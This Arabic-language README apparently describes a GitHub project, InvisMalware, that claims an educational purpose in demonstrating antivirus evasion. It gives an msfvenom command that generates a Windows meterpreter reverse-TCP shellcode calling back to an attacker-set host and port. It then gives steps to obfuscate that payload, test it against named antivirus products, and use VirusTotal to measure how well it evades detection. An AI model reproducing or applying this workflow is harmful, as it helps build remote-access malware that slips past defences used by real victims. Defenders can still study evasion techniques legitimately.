Invismalware هو مشروع مصمم لإظهار تقنيات التهرب من البرامج الضارة المتقدمة التي تتجاوز اكتشاف مكافحة الفيروسات. تركز تجربة البرامج الضارة التي تعتمد على البحث على استخدام أساليب التشويش ، مثل تعديلات التعليمات البرمجية واستراتيجيات مكافحة Sandbox ، للتهرب من الكشف عن البرامج الضارة الثابتة والديناميكية.
هذا المشروع هو لأغراض تعليمية فقط ، يهدف إلى توفير رؤى حول استراتيجيات الدفاع عن البرامج الضارة الحديثة من خلال التعلم من تقنيات التهرب التي تستخدمها الجهات الفاعلة الضارة.
للبدء ، استنساخ المستودع وتثبيت التبعيات اللازمة.
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalwarepip install -r requirements.txtاستخدم msfvenom لإنشاء رمز shellcode عكسي TCP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c قم بتحرير ملف evilexp.c لإلغاء الرمز وتجنب الكشف.
نشر البرامج الضارة في جهاز افتراضي آمن ومعزول لاختبار سلوكه وقياس معدلات الكشف.
قم بتحميل البرامج الضارة الخاصة بك إلى virustotal لتقييم معدل التهرب عبر محركات مضادة للفيروسات المتعددة.
يتبع المشروع منهجية من أربع مراحل لتحقيق التهرب من البرامج الضارة:
قم بتشغيل البرامج الضارة على جهازك الظاهري المجهز ببرامج مكافحة الفيروسات مثل Kaspersky أو Windows Defender أو BitDefender .
قم بتحميل البرامج الضارة المعدلة إلى virustotal وتحقق من عدد محركات مكافحة الفيروسات التي تكتشفها بنجاح.
نرحب بالمساهمات لتحسين المشروع. إذا كنت ترغب في المساهمة:
هذا المشروع مرخص بموجب ترخيص معهد ماساتشوستس للتكنولوجيا. انظر ملف الترخيص للحصول على التفاصيل.